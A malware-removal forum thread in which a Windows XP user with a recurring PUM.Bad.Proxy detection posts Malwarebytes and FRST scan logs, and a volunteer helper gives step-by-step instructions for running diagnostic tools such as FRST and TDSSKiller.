PLUM.Bad.Proxy returns

I scan the system and it finds two files. Malwarebytes cleans them and everything is fine until I restart my computer and the malware is back.

Thanks for any help.

Below is the log information:

-----------------------------------------------------------

Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Database version: v2014.03.18.05

Windows XP Service Pack 3 x86 NTFS
Internet Explorer 8.0.6001.18702
Buddy Harris :: EMACHINE-98E05C [administrator]

3/19/2014 8:27:20 AM
mbam-log-2014-03-19 (08-27-20).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 224542
Time elapsed: 22 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 1
HKCU\Software\Re_Markable (PUP.Optional.ReMarkable.A) -> Quarantined and deleted successfully.

Registry Values Detected: 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings|ProxyServer (PUM.Bad.Proxy) -> Data: http=127.0.0.1:13828 -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

Hi there,
my name is Marius and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

  • First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while following my instructions, stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
  • My first language is not English, so please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

Scan with FRST in normal mode

Please download Farbar's Recovery Scan Tool to your desktop: FRST 32bit or FRST 64bit (If not sure: Start --> Computer (right click) --> properties)

  • Run FRST.
  • Don't change any of the checkboxes and hit Scan.
  • Logfiles are created on your desktop.
  • Post the FRST.txt and (after the first scan only!) the Addition.txt.


Scan with TDSS-Killer

Please read and follow these instructions carefully. We do not want it to fix anything yet (if found), we need to see a report first.

Download TDSSKiller.zip and extract to your desktop

  • Execute TDSSKiller.exe by doubleclicking on it.
  • Press Start Scan
  • If Malicious objects are found, do NOT select Copy to quarantine. Change the action to Skip, and save the log.
  • Once complete, a log will be produced at the root of the system drive, which is typically C:\, for example C:\TDSSKiller.<version_date_time>log.txt



Please post the contents of that log in your next reply.


Hi,

Thank you very much for offering to help.


I'm trying to find out if my system is 16 bit or 32 bit. The only information in my properties is the following:


System
Microsoft Windows XP Home Edition
Version 2002
Service Pack 3

Registered to:
*My Name

76477-OEM-0011903-oo1oo

eMachines Inc.
eMachinesSystem
AMD Athlon Processor
2650e
1.61GHz, 896 MB of RAM
Physical Address Extension


OK, Here are the log files from Farbar's Recovery Scan Tool.


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-03-2014  01
Ran by Buddy Harris (administrator) on EMACHINE-98E05C on 20-03-2014 09:51:44
Running from C:\Documents and Settings\Buddy Harris\Desktop
Microsoft Windows XP Home Edition Service Pack 3 (X86) OS Language: English(US)
Internet Explorer Version 8
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(Microsoft Corporation) c:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Program Files\Re-Markable\Re-Markable_wd.exe
(Microsoft Corporation) C:\WINDOWS\system32\netdde.exe
(Agere Systems) C:\WINDOWS\system32\agrsmsvc.exe
(Microsoft Corporation) C:\WINDOWS\system32\cisvc.exe
(Microsoft Corporation) C:\WINDOWS\system32\clipsrv.exe
(Sun Microsystems, Inc.) C:\Program Files\Java\jre6\bin\jqs.exe
() C:\Program Files\CyberLink\Shared files\RichVideo.exe
(Microsoft Corp., Veritas Software) C:\WINDOWS\System32\dmadmin.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.EXE
(Cyberlink Corp.) C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Sun Microsystems, Inc.) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(CyberLink) C:\Program Files\CyberLink\Power2Go\CLMLSvc.exe
(CyberLink) C:\Program Files\CyberLink\YouCam\YCMMirage.exe
(Dropbox, Inc.) C:\Documents and Settings\Buddy Harris\Application Data\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
(Sun Microsystems, Inc.) C:\Program Files\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\Program Files\Outlook Express\msimn.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Jasc Software, Inc.) C:\Program Files\Jasc Software Inc\Paint Shop Pro 7\psp.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(RealNetworks, Inc.) C:\Program Files\Common Files\Real\Update_OB\realsched.exe
() C:\Program Files\Re-Markable\Re-Markable154.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [RTHDCPL] - C:\WINDOWS\RTHDCPL.EXE [16862720 2008-05-16] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Alcmtr] - C:\WINDOWS\ALCMTR.EXE [69632 2005-05-03] (Realtek Semiconductor Corp.)
HKLM\...\Run: [RemoteControl] - C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe [71216 2007-03-15] (Cyberlink Corp.)
HKLM\...\Run: [LanguageShortcut] - C:\Program Files\CyberLink\PowerDVD\Language\Language.exe [52256 2007-01-09] ()
HKLM\...\Run: [iMJPMIG8.1] - C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE [208952 2008-04-14] (Microsoft Corporation)
HKLM\...\Run: [Windows Defender] - C:\Program Files\Windows Defender\MSASCui.exe [866584 2006-11-03] (Microsoft Corporation)
HKLM\...\Run: [TkBellExe] - C:\Program Files\Common Files\Real\Update_OB\realsched.exe [202256 2010-03-22] (RealNetworks, Inc.)
HKLM\...\Run: [Adobe ARM] - C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [MSC] - c:\Program Files\Microsoft Security Client\msseces.exe [948440 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [sunJavaUpdateSched] - C:\Program Files\Common Files\Java\Java Update\jusched.exe [254896 2012-09-17] (Sun Microsystems, Inc.)
HKLM\...\Run: [CLMLServer] - C:\Program Files\CyberLink\Power2Go\CLMLSvc.exe [107816 2011-03-09] (CyberLink)
HKLM\...\Run: [updateP2GoShortCut] - C:\Program Files\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe [223128 2012-07-25] (CyberLink Corp.)
HKLM\...\Run: [uCam_Menu] - C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe [222504 2009-05-19] (CyberLink Corp.)
HKLM\...\Run: [YouCam Mirage] - C:\Program Files\CyberLink\YouCam\YCMMirage.exe [136488 2012-06-14] (CyberLink)
HKLM\...\Run: [YouCam Tray] - C:\Program Files\CyberLink\YouCam\YouCam.exe [234000 2012-06-14] (CyberLink Corp.)
HKLM\...\Run: [updatePSTShortCut] - C:\Program Files\CyberLink\Media Suite\MUITransfer\MUIStartMenu.exe [222504 2012-06-25] (CyberLink Corp.)
HKU\.DEFAULT\...\Run: [DWQueuedReporting] - C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [434080 2011-07-27] (Microsoft Corporation)
HKU\.DEFAULT\...\RunOnce: [FlashPlayerUpdate] - C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_9_900_170_ActiveX.exe -update activex
HKU\.DEFAULT\...\RunOnce: [Del1175380656] - cmd.exe /Q /D /c del "C:\WINDOWS\TEMP\0.del"
HKU\.DEFAULT\...\RunOnce: [Del26093359] - cmd.exe /Q /D /c del "C:\WINDOWS\TEMP\0.del"
HKU\S-1-5-21-608057341-2165517387-3308722516-1005\...\Run: [Optimizer Pro] - C:\Program Files\Optimizer Pro\OptProLauncher.exe [134648 2013-10-28] ()
AppInit_DLLs: c:\progra~1\google\google~1\goec62~1.dll => C:\Program Files\Google\Google Desktop Search\GoogleDesktopNetwork3.dll [119296 2009-03-13] (Google)
AppInit_DLLs:  c:\progra~1\optimi~1\optpro~1.dll => C:\Program Files\Optimizer Pro\OptProCrash.dll [4074824 2013-10-29] ()
Lsa: [Notification Packages] :\WINDOW
Startup: C:\Documents and Settings\Buddy Harris\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Documents and Settings\Buddy Harris\Application Data\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Documents and Settings\Buddy Harris\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x02A8FBF3371ACC01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
URLSearchHook: HKCU - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} -  No File
SearchScopes: HKLM - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKCU - DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://search.conduit.com/Results.aspx?ctid=CT3310031&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SPDC1460A6-8C8C-42BA-A33D-8C553CCAC6BF&q={searchTerms}&SSPV=
SearchScopes: HKCU - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://search.conduit.com/Results.aspx?ctid=CT3310031&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SPDC1460A6-8C8C-42BA-A33D-8C553CCAC6BF&q={searchTerms}&SSPV=
SearchScopes: HKCU - {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = http://www1.delta-search.com/?q={searchTerms}&babsrc=SP_ss&mntrId=3C08001D72BB6390&affID=119351&tt=160211_ask&tsp=4958
SearchScopes: HKCU - {5424D314-A768-475D-A25D-96E21FCFEB38} URL = http://search.yahoo.com/search?p={searchterms}&ei=UTF-8&fr=w3i&type=W3i_DS,136,0_0,Search,20111146,6901,0,8,0
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL =
SearchScopes: HKCU - {8562D569-A136-4028-B9CF-4E01D372E2F4} URL = https://www.google.com/search?q={searchTerms}
BHO: No Name - {02478D38-C3F9-4efb-9B51-7695ECA05670} -  No File
BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll (RealPlayer)
BHO: Java Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: deAl4me - {BA7B8F3A-20D1-34E9-3785-0CFE3833AFA8} -  No File
BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: JQSIEStartDetectorImpl Class - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)
Toolbar: HKCU - No Name - {472734EA-242A-422B-ADF8-83D1E48CC825} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll (Microsoft Corporation)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll (Microsoft Corporation)
ShellExecuteHooks: Microsoft AntiMalware ShellExecuteHook - {091EB208-39DD-417D-A5DD-7E2C2D8FB9CB} - C:\Program Files\Windows Defender\MpShHook.dll [83224 2006-11-03] (Microsoft Corporation)
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog9 04 mswsock.dll File Not found ()
Winsock: Catalog9 05 mswsock.dll File Not found ()
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Documents and Settings\Buddy Harris\Application Data\Mozilla\Firefox\Profiles\rx2a4r2n.default-1387638332015
FF Homepage: https://www.google.com/
FF Plugin: @adobe.com/FlashPlayer - C:\WINDOWS\system32\Macromed\Flash\NPSWF32_12_0_0_77.dll ()
FF Plugin: @exent.com/npExentCtl,version=7.0.0.0 - C:\Program Files\Free Ride Games\npExentCtl.dll (Exent Technologies Ltd.)
FF Plugin: @Google.com/GoogleEarthPlugin - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/DTPlugin,version=1.6.0_37 - C:\WINDOWS\system32\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @real.com/nppl3260;version=6.0.12.732 - c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprjplug;version=1.0.3.732 - c:\program files\real\realplayer\Netscape6\nprjplug.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprphtml5videoshim;version=1.0.0.0 - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpjplug;version=6.0.12.732 - c:\program files\real\realplayer\Netscape6\nprpjplug.dll (RealNetworks, Inc.)
FF Plugin: @tools.google.com/Google Update;version=3 - C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 - C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.0.3 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.2 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.3 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: Adobe Reader - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprjplug.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpjplug.dll (RealNetworks, Inc.)
FF Extension: Status-4-Evar - C:\Documents and Settings\Buddy Harris\Application Data\Mozilla\Firefox\Profiles\rx2a4r2n.default-1387638332015\Extensions\status4evar@caligonstudios.com.xpi [2013-12-21]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-02-14]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2014-02-14]
FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF Extension: RealPlayer Browser Record Plugin - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext [2010-03-22]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\ []
FF HKLM\...\Firefox\Extensions: [jqs@sun.com] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff
FF Extension: Java Quick Starter - C:\Program Files\Java\jre6\lib\deploy\jqs\ff [2012-09-27]
FF HKLM\...\Firefox\Extensions: [ocr@babylon.com] - C:\Program Files\Babylon\Babylon-Pro\Utils\ocr@babylon.com

Chrome:
=======


CHR DefaultSearchKeyword: conduit.search
CHR DefaultSearchProvider: Conduit Search
CHR DefaultSearchURL: http://search.conduit.com/Results.aspx?ctid=CT3310031&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SPDC1460A6-8C8C-42BA-A33D-8C553CCAC6BF&q={searchTerms}&SSPV=
CHR DefaultNewTabURL:
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Shockwave Flash) - C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_4_402_278.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\31.0.1650.63\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (RealPlayer G2 LiveConnect-Enabled Plug-In (32-bit) ) - C:\Program Files\Mozilla Firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer Version Plugin) - C:\Program Files\Mozilla Firefox\plugins\nprpjplug.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer HTML5VideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealJukebox NS Plugin) - C:\Program Files\Mozilla Firefox\plugins\nprjplug.dll (RealNetworks, Inc.)
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npdrmv2.dll (Microsoft Corporation)
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npwmsdrm.dll (Microsoft Corporation)
CHR Plugin: (Windows Media Player Plug-in Dynamic Link Library) - C:\Program Files\Windows Media Player\npdsplay.dll (Microsoft Corporation (written by Digital Renaissance Inc.))
CHR Plugin: (Exent® AOD Gecko Plugin) - C:\Program Files\Free Ride Games\npExentCtl.dll (Exent Technologies Ltd.)
CHR Plugin: (Google Earth Plugin) - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Java Platform SE 6 U35) - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java Deployment Toolkit 6.0.350.10) - C:\WINDOWS\system32\npdeployJava1.dll (Sun Microsystems, Inc.)
CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll No File
CHR Plugin: (Windows Presentation Foundation) - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Extension: (deAl4me) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bhdkbbbdgijnmanhokhaongilcekhmjh [2014-01-24]
CHR Extension: (Ratchet & Clank Future 2) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\ejhfomhehcinmhgnlhdpghklkjgppdmn [2012-10-08]
CHR Extension: (SaleusiCHeckeer) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\flcmoidkcnpijacjjkldfjfjpgeobggf [2014-03-17]
CHR Extension: (Bargain Workbench) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gebcpofjimbbchggpnfcaiieolloeodp [2014-02-22]
CHR Extension: (RealPlayer HTML5Video Downloader Extension) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jfmjfhklogoienhpfnppmbcbjfjnkonk [2012-09-28]
CHR Extension: (Remove \) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj [2013-08-01]
CHR Extension: (BargainJoy) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\khongjfjjmklggionajlpjcpmnppdace [2014-02-22]
CHR Extension: (Torch Share) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\kiplfnciaokpcennlkldkdaeaaomamof [2014-02-22]
CHR Extension: (We-Care Reminder Lite) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lkpmjnommfoljgjbckjmjhkmnhfmcmon [2012-09-28]
CHR Extension: (Deealu44Real) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\openkkkcbebpnegmpipkfpbfpjmdonmf [2014-02-13]
CHR HKLM\...\Chrome\Extension: [gebcpofjimbbchggpnfcaiieolloeodp] - C:\DOCUME~1\BUDDYH~1\LOCALS~1\APPLIC~1\BargainWorkbench.crx [2013-09-04]
CHR HKLM\...\Chrome\Extension: [gpicboiclhmnllnjdcfcffifpoaebgkm] - C:\Program Files\Freecorder extension\Freecorder.crx [2013-09-04]
CHR HKLM\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Chrome\Ext\rphtml5video.crx [2010-03-22]
CHR HKLM\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\DOCUME~1\BUDDYH~1\LOCALS~1\APPLIC~1\newhb.crx [2013-08-01]
CHR HKLM\...\Chrome\Extension: [khongjfjjmklggionajlpjcpmnppdace] - C:\DOCUME~1\BUDDYH~1\LOCALS~1\APPLIC~1\BargainJoy.crx [2013-09-14]
CHR HKLM\...\Chrome\Extension: [lkpmjnommfoljgjbckjmjhkmnhfmcmon] - C:\Documents and Settings\All Users\Application Data\WeCareReminder\\wecarereminderro.crx [2011-07-08]
CHR HKLM\...\Chrome\Extension: [niapdbllcanepiiimjjndipklodoedlc] - C:\DOCUME~1\BUDDYH~1\LOCALS~1\Temp\YontooLayers.crx [2011-07-08]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

========================== Services (Whitelisted) =================

R2 ca82e1a5; C:\Program Files\Optimizer Pro\OptProCrashSvc.dll [190616 2013-12-15] ()
S2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [20492 2008-07-16] ()
S4 GameConsoleService; C:\Program Files\eMachines Games\eMachines Game Console\GameConsoleService.exe [157144 2008-05-05] (WildTangent, Inc.)
S3 GoogleDesktopManager-092308-165331; C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe [30192 2009-03-13] (Google)
R2 JavaQuickStarterService; C:\Program Files\Java\jre6\bin\jqs.exe [153584 2012-09-24] (Sun Microsystems, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22208 2013-10-23] (Microsoft Corporation)
R2 Re-Markable; C:\Program Files\Re-Markable\Re-Markable154.exe [181248 2014-02-23] ()
R2 RichVideo; C:\Program Files\CyberLink\Shared files\RichVideo.exe [264424 2007-05-13] ()
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [6432 2006-11-03] (Microsoft Corporation)
S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]

==================== Drivers (Whitelisted) ====================

S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2008-04-14] (Microsoft Corporation)
R1 AmdPPM; C:\WINDOWS\System32\DRIVERS\AmdPPM.sys [33792 2007-04-16] (Advanced Micro Devices)
